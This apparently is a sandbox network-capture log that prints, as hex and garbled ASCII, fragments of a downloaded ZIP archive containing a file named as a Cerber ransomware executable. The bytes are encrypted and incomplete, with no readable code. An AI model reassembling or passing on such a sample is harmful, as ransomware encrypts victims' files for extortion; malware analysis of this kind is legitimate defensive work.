                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:48:31 UTC697INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 9c f5 4a 57 39 9c 5a 62 d4 02 00 f8 e4 04 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 43 65 72 62 65 72 35 2e 65 78 65 b3 65 c3 dc f7 40 a4 56 9a af 6a f2 79 cc 2c 79 59 8b af 8c 38 0a 8c 54 10 a7 df ac af 7a 8c 29 fd c4 6e 49 ec 85 d0 b3 ed 8c 20 81 e7 7f fc 7e 72 5c 18 04 0c 93 d2 8e 0f 2e 35 72 7c 8b 97 fc cb 24 10 a0 1e 13 7d 3c 96 80 f9 8a 0c b4 3d 06 97 40 f1 3a 8d c7 b9 1b 60 0c f7 bf c0 c3 dd 3a d6 b5 b1 77 61 f3 44 af 99 7d d7 9a a9 2d 28 38 5c ec bf 85 4f c7 26 7e 99 af ed 48 bf 1f 7e 53 e2 4f 1c 29 93 32 9a 5f d5 7d 8c 9a 1a 45 92 80 a5 6e 26 4a 14 9b 3f f3 10 df ac c9 3b b1 17 e9 99 1c 76 2b 9c f7 83 4d fd bb 4e f3 b4 73 91 2f 63 d7 27 41 25 cc 91 4f 9b 5e 70 c2 ec 61 ad c0 c3 ea e5 8d 28 2b 1d 29 ae f4 f8
                                                                                                                                                Data Ascii: PKJW9ZbEndermanch@Cerber5.exee@Vjy,yY8Tz)nI ~r\.5r|$}<=@:`:waD}-(8\O&~H~SO)2_}En&J?;v+MNs/c'A%O^pa(+)
                                                                                                                                                2022-09-29 12:48:31 UTC698INData Raw: d1 84 c5 d4 4e f6 f4 7f c7 a7 1c b8 30 51 e8 9d 91 9a 16 79 a2 25 b4 d3 df c7 4a 50 85 d5 dc 4c 88 2e ad 06 da 0f 21 d5 8f 8b fb 83 fa d3 c4 3d 6a 14 15 6a 8a 1d ce af af fb 63 e8 46 9c eb 31 11 1f 63 fd db dc 01 4e d6 5e 48 1a f4 af 4d c3 3c b1 78 99 b0 fd 90 a3 0b 3c 55 6d c7 c8 93 29 5f 03 46 d1 90 28 37 5f 9e 18 47 19 62 b7 33 f3 80 31 03 63 88 39 d9 46 03 03 c5 29 88 6e d3 3a 7c ea 56 7a e7 15 77 c4 7b aa 77 a3 d3 d5 8e 16 f8 ac 49 98 b8 32 d8 41 30 75 e2 46 27 0c 4f 4a 5e 70 d1 6d d9 16 2d 20 be 45 30 fc b9 a6 45 e6 09 68 a5 f1 8d 06 3b ca 49 57 f7 46 90 06 35 f2 f9 36 29 3e 58 16 27 dc d5 d3 db c3 87 2a a6 5f cd f9 e2 8d 40 bd 6a 55 33 53 aa 4e 41 0b ad 90 e6 19 76 4a a0 11 08 bc 3c 07 63 3f 3e 55 e5 25 6f ff 68 04 86 12 f3 a3 ac 1a a0 10 7f be 42
                                                                                                                                                Data Ascii: N0Qy%JPL.!=jjcF1cN^HM<x<Um)_F(7_Gb31c9F)n:|Vzw{wI2A0uF'OJ^pm- E0Eh;IWF56)>X'*_@jU3SNAvJ<c?>U%ohB
                                                                                                                                                2022-09-29 12:48:31 UTC700INData Raw: e0 ca 21 7c 26 18 00 be af a3 fa 92 18 53 2d ec 80 7b 35 fe c9 c9 ae 2a c4 7a 7a 8b 8a 1f 2a c9 3c 1a ce fa 50 af cc f8 09 72 fb 18 db 8a 7c 0e 8f b5 c5 18 04 28 0d 53 91 74 a5 d3 3a eb 11 de f1 2f 6a 4e 66 f9 77 5e 3f a8 40 1d 71 ea a0 90 4f 13 ec 46 49 3b 85 91 a8 89 8d 3c 97 36 d8 da 81 29 ff 95 93 e9 bd 7c 46 9d 72 cb f6 d5 0f 58 ea d3 a0 91 6b 73 0f 54 dc 5f 51 8b 78 8f ba 6f 0d 79 db 4d dd 5b 9f 73 61 48 dc 9e 8f a5 02 28 b3 7f 58 af 81 c7 ac 5c 13 1b ad 23 67 50 87 8a 8d e4 91 bc cf cf e3 cd e4 50 34 96 f1 45 38 fe 96 55 0d bc f4 f0 8a d7 0d 02 8a b1 91 7a 2f ce bd dd eb cc 1c 72 38 12 81 26 a2 e0 ce 1b 17 04 9b 44 ab 36 31 ad f9 2d a7 92 23 19 3a 18 0f e5 66 e7 4f f5 ae 71 7d ac fd 25 c7 49 da f3 cd 69 52 06 1b e5 23 4e db ae 0f fa 0c f6 c9 8b 5f
                                                                                                                                                Data Ascii: !|&S-{5*zz*<Pr|(St:/jNfw^?@qOFI;<6)|FrXksT_QxoyM[saH(X\#gPP4E8Uz/r8&D61-#:fOq}%IiR#N_
                                                                                                                                                2022-09-29 12:48:31 UTC701INData Raw: b1 95 ca 00 d2 01 23 1b 31 7a 44 41 2a a0 ce c8 8a 8c a2 54 2d fb 2a 90 19 79 56 37 dd f2 81 4a 00 be 74 46 79 3f 34 6a 41 e2 26 2f 8a 05 b3 5a ae be 0d 8c 92 a3 14 a5 03 06 f2 57 c6 a0 00 78 7a 00 ff e8 eb 33 b9 5a bc 8a f5 d2 42 71 61 2d 59 74 7b 2d fc 58 eb 5b 50 d1 ab 94 fa d6 4f 82 c8 52 0f be 99 f5 2f d8 ec 1a 49 30 40 b1 03 c3 fb d3 1f 9f 3b ba d7 09 58 83 96 e6 3a f5 9d 37 2a d0 cb d1 95 0e 99 06 de c3 86 96 f6 1c 0c d8 84 13 95 7c 04 e5 6d 94 6b 85 9b ef 0c 11 f7 77 35 6d f1 8a 24 18 fc 58 a5 1e e5 f0 07 b7 06 5b 13 22 16 43 c8 86 d6 4c 8c bd 7e b7 49 d5 13 c9 e1 cc 0c 2c f9 1d fb 23 67 f4 66 11 93 b5 4e 3a 87 13 2d 6d ba f6 d8 3a 7d 0b 60 0b a0 f0 77 08 a2 0e a1 bb e8 ad 64 4c 84 9d 50 b2 03 ff 87 5b bf 36 26 b8 9d 6a 31 f3 f3 80 30 24 22 f0 7d
                                                                                                                                                Data Ascii: #1zDA*T-*yV7JtFy?4jA&/ZWxz3ZBqa-Yt{-X[POR/I0@;X:7*|mkw5m$X["CL~I,#gfN:-m:}`wdLP[6&j10$"}
                                                                                                                                                2022-09-29 12:48:31 UTC702INData Raw: 8a 2a c4 f8 91 89 1a 5d 81 8d 17 5c 48 09 db c2 d6 70 c8 40 ec dc 7e 10 a8 09 b1 11 50 4b 11 bb 35 88 1e 56 18 c3 b6 73 f4 e9 58 93 3e d6 bb f8 50 05 1f 85 47 c4 91 03 5c 57 96 4d df aa f7 f3 62 35 56 be a7 8c e1 b9 59 34 c1 bf 41 0e 15 ed 87 04 7f ae 41 f3 9a 17 6f 86 23 e8 44 bf 9b 29 94 14 c6 1c 1d f3 3b 3f 9f ee f7 03 51 31 15 28 fb 1b 57 b4 db 6a d5 8a 67 d8 90 83 07 75 03 19 b6 20 94 3a 9d 91 45 1f 46 a7 62 2e 4a f3 51 ca be 15 fe 9a bd 33 25 c4 b7 83 d6 33 00 01 b3 73 06 6c ab 09 b2 62 ec 83 44 b9 96 ae 45 cf 46 ab 45 5e f7 35 eb 08 6f b0 33 42 93 37 1a 3f 79 e4 ce 44 b9 f1 fa 26 31 2e d9 fb 95 12 bf e9 3c 72 31 30 75 60 89 53 ff 60 b5 ed ea 33 16 75 0d 3c 15 34 bb ee 4e 30 a5 80 46 b9 ed 2f 15 29 c5 3d aa 32 51 a3 c8 cc 99 b2 c0 de 96 08 6b 13 ec
                                                                                                                                                Data Ascii: *]\Hp@~PK5VsX>PG\WMb5VY4AAo#D);?Q1(Wjgu :EFb.JQ3%3slbDEFE^5o3B7?yD&1.<r10u`S`3u<4N0F/)=2Qk
                                                                                                                                                2022-09-29 12:48:31 UTC704INData Raw: f3 7a 2d ab 67 5d 75 fd ec da ee e2 3c 28 ef ea 02 43 29 18 7b f6 4c 1e ab 2c d9 93 a0 d0 23 3d 12 ef 10 19 0e 69 d2 74 7b 12 2f 6d fe d0 54 cf 72 9e 28 4b 58 d2 0f b8 69 b7 8d 61 11 26 52 6e 53 51 ce 18 88 d5 6d 93 6e 34 38 57 b9 e6 13 30 17 6d 88 9d e9 5d bb 12 83 e7 50 15 0e ad c0 4d fc ba 2e fc b7 2d 8c bc d7 7b ca 0c 6e 0d 73 83 1d 09 9a 8b 65 ef 20 50 4d f9 3c 01 14 86 47 dc ef e7 47 c3 38 59 d7 8a 53 d8 33 57 a8 99 7e 16 34 31 59 bb 79 af 32 89 80 e9 c1 d8 c7 c2 64 7b 6b 59 47 50 a6 40 3e 52 d2 18 14 c5 22 e6 88 79 aa 85 48 f4 1e fd 23 8c c5 75 56 40 97 be 91 1d fa a4 0a 78 db 75 c8 15 7c b3 0d 07 95 93 a4 8c 52 0d 96 32 e6 69 09 64 f0 e4 f5 7f b2 a6 b6 f1 7a 68 08 e6 3c 72 ac 68 1e 71 50 6f 3e ae 5b 8f 01 ca 68 70 7e f8 73 79 19 52 e0 b7 e0 27 24
                                                                                                                                                Data Ascii: z-g]u<(C){L,#=it{/mTr(KXia&RnSQmn48W0m]PM.-{nse PM<GG8YS3W~41Yy2d{kYGP@>R"yH#uV@xu|R2idzh<rhqPo>[hp~syR'$
                                                                                                                                                2022-09-29 12:48:31 UTC705INData Raw: bf 7c 25 8e c2 c9 aa 08 83 0e c2 68 e1 04 8c 82 d5 55 7c dc 99 29 49 dc f7 c6 15 b1 1f b7 5e 4f dc d9 46 8a 05 e1 1b 09 c0 54 99 20 ef 67 ad b6 30 bd e9 83 07 a7 f5 b1 83 60 1f 0b 35 3e 0a 68 ed 2d ad 54 1e f3 e3 e6 bc 95 d6 b5 12 9e bf b8 84 6f 2b df 9b e0 f7 0f f4 a1 11 f8 6e 9e e7 37 b9 00 68 2a a6 4c dc a7 97 61 8a a8 10 24 f9 e8 30 f9 e7 b6 04 4d 1e db 93 bc c2 85 bf 53 7a 1c 0c 0a 98 d7 ff d5 ee 6b 7c 55 93 da 75 05 9a 68 fc 8b e9 db a4 5a 36 d6 8b b8 7a 96 ed 20 af 4b f0 e1 8f b7 b8 6f 7e 7b 71 78 5e c5 eb 71 80 61 44 aa 11 92 78 92 f9 d7 49 08 91 57 78 37 82 ed 4b 49 6d dc 30 aa 59 79 d1 d6 3b 76 b2 ec 43 86 8a c9 b0 d8 7d 86 49 d3 a1 fb 32 d5 30 17 22 10 ea ab ae 64 32 5d ce 9e 29 12 3f c4 ba 1d bc 11 71 cc 44 c0 c1 0a 10 19 23 b3 b3 1c f4 1b e2
                                                                                                                                                Data Ascii: |%hU|)I^OFT g0`5>h-To+n7h*La$0MSzk|UuhZ6z Ko~{qx^qaDxIWx7KIm0Yy;vC}I20"d2])?qD#
                                                                                                                                                2022-09-29 12:48:31 UTC706INData Raw: 48 fc f7 dd 84 86 31 d7 41 75 61 f1 d6 42 07 f1 9a 00 14 2d 61 cd c8 f4 f0 d1 f2 f9 71 a0 0e 89 73 58 38 09 07 d0 ce 4f 59 31 78 0c 90 ad e8 f5 3d bd 8a 81 d5 bd f1 8b 87 f5 ce 73 e0 a2 89 e6 6b 84 8d c8 7a 36 92 2e 99 a9 c5 58 3b a2 c7 3f 22 4e 8a d5 4d 83 ae eb 15 af c3 52 c1 7d f9 9d 4c c1 f3 bd 1b b4 98 70 93 7c 5d d4 4b 63 3d 5f 65 ff df 79 85 cd 68 8d 1d 7d 3c 1a c8 32 a7 c9 82 41 86 1d 51 e2 7c 74 41 e9 83 3e 56 01 91 93 30 8a 23 5c 3d b9 d3 1a 5a 7c 32 7e b6 9e 48 29 05 08 60 1c 90 78 b2 06 f8 4e 88 94 86 16 7a 3a b9 9b 2b 12 90 c0 5d 6a 01 f9 45 16 87 7f 9e e5 19 51 9c 09 de 93 ed f0 9b 62 dd 74 41 bf fb 8e f1 fe 90 a6 93 db 2d 16 97 29 9a cd 82 10 46 b5 e7 3f 4c 3c 3d 65 66 af e0 d9 ff 14 52 8b 0b 2e 8c 39 da 67 bb 3a 0a d9 a1 8b 4c ea 36 64 4b
                                                                                                                                                Data Ascii: H1AuaB-aqsX8OY1x=skz6.X;?"NMR}Lp|]Kc=_eyh}<2AQ|tA>V0#\=Z|2~H)`xNz:+]jEQbtA-)F?L<=efR.9g:L6dK
                                                                                                                                                2022-09-29 12:48:31 UTC708INData Raw: f4 75 34 ba 52 b4 52 83 cc 26 fb eb af b2 47 ec ec c3 bf 8a 38 3e 24 97 83 ec ef 8d 3b a0 5e 6f af 3f dc 96 b5 b1 e8 16 1f 57 23 0d f6 3d d3 d5 16 d6 3c a4 20 7d c3 fa a1 95 e2 27 5c 70 07 8e f2 2f 4c a4 97 68 55 41 c6 07 8d 96 8c f2 41 dc 6c f3 70 ef 2d e9 f6 25 bf b1 8e e4 b0 3a 8a 95 6b 32 34 c4 37 92 c2 16 95 b8 54 7b 1b 25 a3 60 18 3e 4f 2d 54 f5 ef 43 0e d9 a9 e4 b6 86 4f d5 52 95 c3 9b f0 50 ac 98 f0 9f 99 27 70 a3 c3 87 33 4b 24 84 6b 1c 91 ae 37 f3 bd 14 3c f3 68 91 47 d3 4b cf 31 67 38 8e 39 43 a6 98 9f 40 37 c3 94 25 9a e8 04 32 f4 51 2a 9d ae 94 47 1d 7a ba 13 6a 05 bc ba 1f 44 92 15 7b 2f 1d 42 d8 43 1d 02 e0 cf f8 ca c9 58 fb be 98 a0 26 e2 4a bb aa f2 fe fb 14 90 af 6b 34 44 e4 1a 44 7c a6 1a f8 e8 e1 e1 56 41 eb a2 2f fc b9 7c c6 d7 08 5f
                                                                                                                                                Data Ascii: u4RR&G8>$;^o?W#=< }'\p/LhUAAlp-%:k247T{%`>O-TCORP'p3K$k7<hGK1g89C@7%2Q*GzjD{/BCX&Jk4DD|VA/|_
                                                                                                                                                2022-09-29 12:48:31 UTC709INData Raw: 68 a4 f5 2a 19 a9 5a f7 a0 49 b4 9b ae 6c 71 ed 85 c4 15 e9 8d 45 fc ce 67 19 a0 58 e4 4a c1 11 a6 c3 07 4d b4 8e 49 83 6d 6d 51 e0 4c c2 7f 26 58 9e 6e 08 ce f8 ce 18 71 5a db f3 da 00 9d c4 db 33 97 0e 75 d2 6c f6 d8 66 df 40 2a bf 6d 7c 61 14 6d 3b 35 00 8b 2c 3d f0 47 32 7a 5d ba 4a e0 62 42 71 c3 77 69 b3 fb cf 7d 21 fc 46 e6 50 e1 6f f0 ba 0c 91 a6 bd be aa e0 15 57 76 5c 6d 37 ba 8e b2 a7 52 6b dc 56 01 1f 73 ca 54 e2 dc b9 99 06 ce d5 f3 67 ba 68 d2 42 91 ad 24 09 d9 3a 33 43 f0 a8 e7 a9 5e 8d 7a 4b 4d 93 30 7b 23 9d 7d 64 97 62 b8 b0 2c 7f 7d 86 28 6e 1e 5c b8 be 88 75 13 b4 03 56 22 0a dd 50 7d a6 b8 10 b5 a3 8f 1c 6b 86 c3 19 54 30 4a a1 44 14 b0 fc ca c0 56 5e e5 5b 0d 60 d6 32 0a 23 c4 59 8b 45 53 0c 09 dc 3d 1c 50 08 3f e5 c7 4e a6 2b ae 44
                                                                                                                                                Data Ascii: h*ZIlqEgXJMImmQL&XnqZ3ulf@*m|am;5,=G2z]JbBqwi}!FPoWv\m7RkVsTghB$:3C^zKM0{#}db,}(n\uV"P}kT0JDV^[`2#YES=P?N+D
                                                                                                                                                2022-09-29 12:48:31 UTC710INData Raw: f0 b6 ff 5e 86 bd 6d 4b 60 ba ce ca eb 1c ab c1 ac 61 85 f7 06 87 04 c1 e5 77 2a c5 4b ad 39 6e d9 3a 53 98 43 8a a9 9c 4a 6d 0b 8f 54 17 57 99 7a cd 0e b2 85 e9 3e 21 33 7d 8c 02 8d a9 aa a4 b0 c6 f2 b3 36 84 bd eb 63 ec a5 ac 3a 2f 68 65 ed a0 8b c1 11 fd 5d 89 01 c4 e7 a8 b9 a4 bf 87 57 75 01 ce f1 eb 41 de 8e f2 99 75 6b 73 24 1d 42 d8 7b a8 e4 d2 39 ae 9e 99 13 3e 1e 18 f7 f2 f5 86 05 ee d1 d5 df 49 fe 3d fc 77 5b 93 64 09 75 66 ae 92 07 b0 19 2a a3 14 03 8c 05 af d0 ad d1 dc bb b8 22 a1 41 6a 1d 13 da 67 1e 0c 37 2a 93 71 1e 1a f7 fa 8d d4 73 b5 8f 34 a1 2b c3 fc d6 3f cb f6 80 0e 8b 75 20 c4 ff d3 b1 70 0d 4c 07 c1 9f 38 a1 75 56 ee 1f 1a 00 22 0f e4 b2 12 15 dd 63 12 24 d1 c3 35 9e 28 37 01 d5 22 2e 2c 01 eb b9 45 06 b1 0a 08 f4 93 84 a8 1f 5a ce
                                                                                                                                                Data Ascii: ^mK`aw*K9n:SCJmTWz>!3}6c:/he]WuAuks$B{9>I=w[duf*"Ajg7*qs4+?u pL8uV"c$5(7".,EZ
                                                                                                                                                2022-09-29 12:48:31 UTC712INData Raw: df 0b b4 96 3b 14 03 55 cd 0e 2b 6d d4 12 a9 22 63 a6 41 19 1b 00 19 d4 9b 88 9a 44 69 63 0d 98 45 59 fe 7c ec 0d e8 e4 1a 3a ca d1 34 d3 16 6e fe 00 f9 70 f0 2a 1b be c4 2e 74 ae d9 c8 49 cf 71 51 01 2c 74 23 c1 14 34 ff 0a b7 d2 9a 86 69 07 31 43 fb d6 d3 34 dd 85 3d 21 5a 06 b1 20 39 53 18 62 ba e1 8c 4a bf 9f 78 04 bc 9b 0d 9f 98 fd 73 d3 48 e8 f7 22 5e bc 19 2a 98 5f e3 c4 22 f4 d9 ed 7c df 51 8a 02 87 ed 49 b9 b6 ab eb 48 69 c6 4b d9 bf b3 51 91 84 6e 60 5b 07 e4 1e b9 3a 9e b6 8f 25 f3 70 11 65 0d 24 91 36 4d 26 d2 10 a1 db 11 cc 1f f6 3f a9 e5 99 a1 d5 26 35 f9 b5 ee 29 91 39 ef e3 fd 2f 3c ce 61 49 22 83 ef 6b 8d 79 90 16 25 56 cc 76 e8 37 01 e5 31 2b 07 c4 61 7e 67 9e 1e f5 08 7d 1b b8 b4 f7 70 b4 82 22 38 04 b8 c9 17 05 d5 b7 4c c7 4e 96 09 d0
                                                                                                                                                Data Ascii: ;U+m"cADicEY|:4np*.tIqQ,t#4i1C4=!Z 9SbJxsH"^*_"|QIHiKQn`[:%pe$6M&?&5)9/<aI"ky%Vv71+a~g}p"8LN
                                                                                                                                                2022-09-29 12:48:31 UTC712INData Raw: 91 f7 25 70 99 e8 5f f8 48 e6 a8 16 17 99 dc b6 51 d8 6d 2b a5 a9 57 9a 79 db 40 75 74 cc 66 2d 8c 0a 06 f9 6f 7e dc 53 7d 94 32 43 43 e9 98 66 7e 44 8f 28 c1 59 0d dd 73 e8 b0 9a 25 f1 c3 7a 50 84 ab a6 b1 d4 19 46 60 32 76 3a 86 7d 48 17 4f 50 35 c7 9c b6 e6 72 e2 95 42 39 a8 79 94 eb 2c 02 6f 9f d5 0f 7e 54 c4 3c 33 7f 77 c3 97 99 de 1b 21 14 7f cb a6 d9 29 87 c6 5f 44 3a 17 70 bd fe e2 fc 3f ca 08 b9 c8 6a c5 b8 c7 bb 79 74 35 79 dd 5e eb 54 37 73 51 95 08 24 14 72 48 f9 aa f9 9e 07 87 a2 05 ac 17 73 33 7f 12 95 71 30 f7 c1 61 e1 0a ac 14 5a e3 d7 12 67 d3 8b af 49 bc 88 eb 97 c9 00 c0 e4 02 86 94 44 f2 10 5f 5a 59 a3 fa 58 65 1c 57 56 66 9b f4 09 94 46 22 3d 9c 19 fb 11 d6 6f 19 4b b4 28 be 06 e1 63 42 e7 da d2 da 34 9a 10 22 cb a5 31 6a c3 b3 b0 e1
                                                                                                                                                Data Ascii: %p_HQm+Wy@utf-o~S}2CCf~D(Ys%zPF`2v:}HOP5rB9y,o~T<3w!)_D:p?jyt5y^T7sQ$rHs3q0aZgID_ZYXeWVfF"=oK(cB4"1j
                                                                                                                                                2022-09-29 12:48:31 UTC728INData Raw: b6 67 dc 14 31 58 19 f2 1f 0f 8e 06 22 d3 57 15 72 f4 42 06 d7 4f f1 83 13 69 64 06 a8 0d 76 7e 13 22 46 95 f3 d8 93 01 c5 4c 25 e2 d1 84 f5 fc 29 11 96 d8 ba 22 d2 48 7b 22 08 5f c2 1e fe 3a f1 46 ec 80 89 d8 77 97 31 08 f1 bd cb 38 30 b0 9f 91 23 b4 e8 af e3 69 8d 19 97 f5 f5 4a 99 f7 da 3b d2 4c 1b 96 6a d3 e1 5f 68 a5 00 e7 06 16 29 ae 20 d7 0e 8c 60 8f 9d 61 73 12 4b 3f cb a9 a4 3b c0 6f 2d 0a ee b2 3e 57 23 f4 39 59 16 66 65 80 69 97 3a 0a ca 0e 30 32 4d a4 93 6c f8 20 0d 77 a1 e9 a5 73 97 d2 f2 47 a5 b1 c3 c8 51 f5 35 d1 a4 9d 0c 66 45 26 24 ef 00 f8 8a 28 22 5b 61 a4 76 ae de 77 33 30 b9 e2 e0 eb dd 2b a7 76 51 bc f2 be c7 bc 41 46 b7 6d e1 bd c7 2e 23 cf c5 17 88 95 4b b2 58 c7 46 75 b2 b2 b2 92 c5 1d ca c4 01 34 c3 09 97 af c3 2c 74 f3 5d 26 81
                                                                                                                                                Data Ascii: g1X"WrBOidv~"FL%)"H{"_:Fw180#iJ;Lj_h) `asK?;o->W#9Yfei:02Ml wsGQ5fE&$("[avw30+vQAFm.#KXFu4,t]&
                                                                                                                                                2022-09-29 12:48:31 UTC744INData Raw: 9d de 4d 9a 8e 59 8d c1 b2 14 3d 9e 92 ed fd 47 2d fd da 4d 94 db 7e a0 48 9f d2 9d 29 e3 eb 4b 25 0c 57 b4 5f df e1 22 87 ce 6e a3 71 92 1e 54 d6 f9 d6 31 90 1f cc fb de c0 90 07 33 cb e9 b3 99 ee f4 13 00 15 d5 ec 65 4c 16 4e a3 54 30 bd fa 6c d2 ae 0e c1 3c 03 ec 80 d5 cd bf 1a ad 79 6a b2 65 c7 9f 66 a7 be de 44 74 24 72 96 4d 81 6f 1d e6 88 58 fc 8e 20 98 11 1d 18 27 6e 72 bd b5 c5 8d f9 81 fb cf d0 3b 24 06 f3 f8 b2 62 19 8d 5c 37 72 e6 b0 9c e7 8e 4e 3a a3 5b 19 ce e1 aa f3 29 29 22 3f 15 96 8f 77 c4 1e e4 40 7c 89 7e fb dd d5 94 bc aa 30 db 1c 55 67 62 f2 27 fe e4 ef 3a b5 16 8c 6c 23 80 eb 1c 0a 4f db 11 de a6 06 ac f4 02 85 38 ea f0 a8 49 06 1f d0 43 b4 ad 60 d6 b5 b7 f4 60 ec 4c 3a 0e cd de aa 3b c5 61 e4 70 d5 f8 fd c8 b5 0b 0c e7 38 0c d1 c5
                                                                                                                                                Data Ascii: MY=G-M~H)K%W_"nqT13eLNT0l<yjefDt$rMoX 'nr;$b\7rN:[))"?w@|~0Ugb':l#O8IC``L:;ap8
                                                                                                                                                2022-09-29 12:48:31 UTC760INData Raw: 26 58 c4 6f c1 18 0b 51 41 9c 3a 4f 19 2a ec fa 4c 17 70 3f 35 09 86 db 43 3b b7 8b 78 47 45 08 2b 85 af 10 69 71 d9 c9 a8 5c 74 1d e9 d1 e2 40 9a dc 7c f3 a8 39 63 5b d7 fd d9 8c 65 b3 ae ac e1 64 5b 74 b5 6d 6d 95 92 5b 29 a1 fd 20 5b 6c 52 5a 7c ec dd 0b ec 7b 5c b6 2b 77 5d 1c a0 36 51 5e 9c 2b 99 13 88 2c 1a 91 ab 63 37 63 bd 67 17 79 03 e8 84 d8 66 a6 ab e6 f3 f5 f4 db b5 13 ec 04 9e d9 36 32 f7 95 d5 23 37 57 cc 6b ff d6 ac ae 18 28 d5 b9 b0 1e 55 4a 21 ea 71 72 4a 60 a3 97 5a cd 39 62 39 a1 9e 4e e8 18 54 0d 30 07 0c 78 5d 8f 1d 2c 10 7d c1 40 f7 86 6b eb 81 4b b2 15 a9 db 17 51 db e6 5f cc a3 d1 53 73 df ef 66 3a 8b f2 b7 8e 58 e1 5c 30 79 f6 a4 48 9b 75 e4 16 63 c3 fa 3a 7d 63 e5 fe 76 1e f5 f3 01 c1 db be 5b 16 81 cc 39 9c f5 f7 8c 17 e5 15 95
                                                                                                                                                Data Ascii: &XoQA:O*Lp?5C;xGE+iq\t@|9c[ed[tmm[) [lRZ|{\+w]6Q^+,c7cgyf62#7Wk(UJ!qrJ`Z9b9NT0x],}@kKQ_Ssf:X\0yHuc:}cv[9
                                                                                                                                                2022-09-29 12:48:31 UTC776INData Raw: 07 5f 28 3f af a5 64 40 57 d9 b8 38 76 91 c4 d6 20 fa 25 cf f4 be 17 05 26 a0 33 f3 a9 44 55 c1 99 e6 9e c9 2d ca d1 54 9c 5d 1d a8 d9 d6 a6 69 a4 ef e5 ab d6 42 f7 75 0d 40 a8 63 19 69 e8 ea b1 cb 42 18 0a 75 af 82 bb dd 1b 6f 16 28 75 2b c8 eb e9 c8 22 bd 37 4e b2 64 92 77 b2 a1 2d 16 fb 0a 15 c2 13 7b 29 ce 8d 22 19 3a b9 60 b1 5c 59 9d 40 37 a4 14 2c cf 2a 4b 8b 4a da bc fe 04 d9 cc 13 34 98 11 36 55 7e 17 6e 0d 9b ef d5 67 f9 f8 6b d5 e3 16 58 f1 3c 66 d8 72 70 0b 7e 75 24 e6 57 44 a9 58 97 89 87 e2 a8 ff e6 6d d4 78 dd 71 74 63 b6 cc 7c 6f 38 64 e2 71 c6 22 83 6c 49 04 6d a0 39 bd d6 22 60 89 7f b4 48 17 dd f6 43 45 61 63 5f e1 87 d9 6b 36 fa 45 73 70 bc 07 6d 0f 3d 19 6b bb 13 a8 b2 76 d6 c7 6c 99 20 94 fe 13 2f c1 53 f8 9f 8a 3a 89 cc dc 8a d2 86
                                                                                                                                                Data Ascii: _(?d@W8v %&3DU-T]iBu@ciBuo(u+"7Ndw-{)":`\Y@7,*KJ46U~ngkX<frp~u$WDXmxqtc|o8dq"lIm9"`HCEac_k6Espm=kvl /S:
                                                                                                                                                2022-09-29 12:48:31 UTC792INData Raw: 43 1d d7 0a b2 c6 c3 92 13 28 91 87 a6 d3 70 1c 21 99 0f 71 f5 03 51 b8 b3 6b 81 ae 2d c7 cb a3 54 65 e2 d0 8e 42 a5 12 86 45 34 29 74 e9 1c b0 57 ef 08 b5 ba 9d d3 2f a2 a2 d3 eb 1d 5a 73 b5 4a 55 41 58 50 a8 4c 04 78 74 98 6e 47 5d 33 33 1c 07 59 57 7f ff fd 3b b5 c4 ee f8 bb 6f 59 61 7c 8a d8 6c ac 6d d7 78 81 25 6c 1b 15 ef e7 20 bc 8e ac b2 c9 86 b9 f9 e6 ae f3 82 fb 9e a8 78 10 81 8d 36 44 10 5a 78 a3 dd f7 e3 63 78 7b cf 04 c2 5b 97 72 0f ad 73 a7 b7 cd 33 97 3f c8 8f dc c9 c8 3d 0a ed 1d f9 d0 04 78 38 7e 76 34 04 28 57 7a 37 4e ef b6 77 2d 02 8c 04 b6 c6 d4 49 0c ef 5c 46 54 c9 e2 bc 1d e4 97 5d ba f6 3a 9f 22 fb f8 b1 7e bb 77 71 ae 2e c0 b2 0a 3d f3 d6 1f c4 48 a9 95 b5 ce cd 62 b3 53 80 90 a4 cd 43 13 22 d9 f7 7e 1a cd c2 4c 42 72 8d 15 c7 c6
                                                                                                                                                Data Ascii: C(p!qQk-TeBE4)tW/ZsJUAXPLxtnG]33YW;oYa|lmx%l x6DZxcx{[rs3?=x8~v4(Wz7Nw-I\FT]:"~wq.=HbSC"~LBr
                                                                                                                                                2022-09-29 12:48:31 UTC808INData Raw: bf 64 8d 3f 83 70 c0 19 4e e9 8a 25 64 79 61 85 c9 06 7f e9 fd 75 50 b2 da 53 a6 2f f5 54 68 94 9d 1a 32 72 87 ba 30 03 35 10 aa fd 92 dc ad de 6b 0d fb b4 7d af 47 c3 21 14 ca 78 d4 7d 13 58 87 73 7f 70 b0 71 59 1b 71 51 6a 1e db f5 95 76 59 1f f5 8a 59 cf f2 95 3f bb 0a 82 f8 ea e5 d1 dc 7e 45 dd 14 c9 a4 87 e2 4d c8 c2 5a 58 5c b2 bd d4 0d d7 b2 73 7e 5c 1c 5f 05 83 69 78 74 dc a2 64 a4 6b a3 0d 09 ac 78 4e 65 de 49 d5 79 9a 75 98 17 7e 73 b5 d2 52 51 c8 4f 14 13 33 09 30 bb 2c 02 06 06 b4 b5 6e 69 17 4d a5 4f d7 c1 19 6c f9 b4 f0 e0 49 ab a8 31 26 fb 20 31 aa 14 0e 6d 86 03 ab 72 9f 95 e9 99 75 07 03 1c 7f 7e ff ca f6 6c d4 52 2a e0 b0 99 7e 86 d3 38 e6 74 ba 0b 34 e3 f4 60 c1 91 73 fb d7 2c 90 d3 97 c8 f7 94 04 3d f5 e8 89 cf ea 88 8e 19 b5 5b 03 69
                                                                                                                                                Data Ascii: d?pN%dyauPS/Th2r05k}G!x}XspqYqQjvYY?~EMZX\s~\_ixtdkxNeIyu~sRQO30,niMOlI1& 1mru~lR*~8t4`s,=[i
